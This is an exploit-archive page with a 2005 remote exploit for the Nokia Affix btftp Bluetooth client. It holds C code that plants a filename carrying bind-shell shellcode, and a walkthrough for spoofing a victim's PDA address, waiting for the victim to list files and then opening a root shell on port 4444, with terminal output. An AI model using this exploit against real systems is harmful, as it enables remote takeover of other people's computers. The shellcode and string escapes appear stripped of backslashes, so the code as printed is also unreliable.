[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Nokia Affix < 3.2.0 btftp Remote Client Exploit
# Published : 2005-07-03
# Author : Kevin Finisterre
# Previous Title : Ethereal <= 0.10.9 "3G-A11" Remote Buffer Overflow Exploit
# Next Title : Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit
/*
- Tools you will probably need:
- http://www.digitalmunition.com/setbd-affix.c
- KF is one bad mofo /str0ke
Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8¨¢?yT)¨¢?Tnb 6 u???u???3¨¦¨¦?¨¨????¨¤^v?0^?¨¹a?¡§5?¨º24???¡Á?#¡ã¨¨¨²?V62V
?-1?)yT
yT?yTD¨¦??Xq?X6?Y0
----------------------
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
#include <stdio.h>
#include <strings.h>
main()
{
FILE *malfile;
/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */
unsigned char scode[] =
"x33xc9x83xe9xebxe8xffxffxffxffxc0x5ex81x76x0ex99"
"xeex30x5ex83xeexfcxe2xf4xa8x35x63x1dxcax84x32x34"
"xffxb6xa9xd7x78x23xb0xc8xdaxbcx56x36x88xb2x56x0d"
"x10x0fx5ax38xc1xbex61x08x10x0fxfdxdex29x88xe1xbd"
"x54x6ex62x0cxcfxadxb9xbfx29x88xfdxdex0ax84x32x07"
"x29xd1xfdxdexd0x97xc9xeex92xbcx58x71xb6x9dx58x36"
"xb6x8cx59x30x10x0dx62x0dx10x0fxfdxde";
char buf[1024];
memset(buf,'�',sizeof(buf));
memset(buf,'x90',94);
strcat(buf+94,"x75xfbxffxbf");
strcat(buf+98,"x75xfbxffxbf");
memset(buf+102,'x90',40);
strcat(buf+142,scode);
if(!(malfile = fopen(buf,"w+"))) {
printf("error opening filen");
exit(1);
}
fprintf(malfile, "pwnedn" );
fclose(malfile);
}
/*
First lets find someone to impersonate.
root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done. Resolving names ...
done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth Modem"
Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
Computer (Handheld PC/PDA) [Networking,Object Transfer]
Lets pretend to be some poor chaps PDA.
root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8
root@frieza:~# btctl
bt0 01:02:03:04:05:06
Flags: UP DISC CONN
RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0 00:04:3e:65:a1:c8
Flags: UP DISC CONN
RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# btctl name "Pocket_PC"
God I love my ROK chip!
Wait for the poor chap to use his affix btftp to connect to his Pocket_PC.
Hopefully his bluetooth stack confuses us for his PDA.
Obviously you need to find out the general area of your shellcode and fix the exploit accordingly.
0xbffffb70: '220' <repeats 40 times>,
"3¨¦203¨¦?¨¨????¨¤^201v�16231?0^203?¨¹a?¡§5c�35¨º20424???¡Áx#¡ã¨¨¨²?V62102Vr�20�17Z8¨¢?ab�20�17yT)210¨¢?Tnbf?-1?)210yTn2042a)?yTD227¨¦?222?Xq?235X6?214Y0�20rbr�20�17yT"
root@frieza:/var/spool/affix/Inbox# pico ../btftp-ex.c
root@frieza:/var/spool/affix/Inbox# cc -o ../btftp-ex ../btftp-ex.c
root@frieza:/var/spool/affix/Inbox# ../btftp-ex
Verify that a nice long file name is left behind.
root@frieza:/var/spool/affix/Inbox# ls
??????????????????????????????????????????????????????????????????????????????????????????????u???u???????????????????????????????????????????3??????????^?v???0^??????5c???24????x#????V6??V???Z8??a?????)???Tnb?????)?????2?)?????????Xq??X6??Y0??b?????
Start up the bluetooth services.
root@frieza:/etc/affix# btsrv -C ./btsrv.conf
btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11
Wait for the person to connect to your device and attempt to perform a file listing.
This of course will trigger the overflow and execute your shellcode
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8¨¢?yT)¨¢?Tnb 6 u???u???3¨¦¨¦?¨¨????¨¤^v?0^?¨¹a?¡§5?¨º24???¡Á?#¡ã¨¨¨²?V62V
?-1?)yT
yT?yTD¨¦??Xq?X6?Y0
You can tell when they have connected via the following log file entries.
btsrv: handle_input: Connection from 00:02:01:44:ad:99
channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2
After they have done so you will use the PAND connection you already hacked to obtain your shell. =]
Or perhaps write some bluetooth aware shellcode.
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
// www.Syue.com [2005-07-03]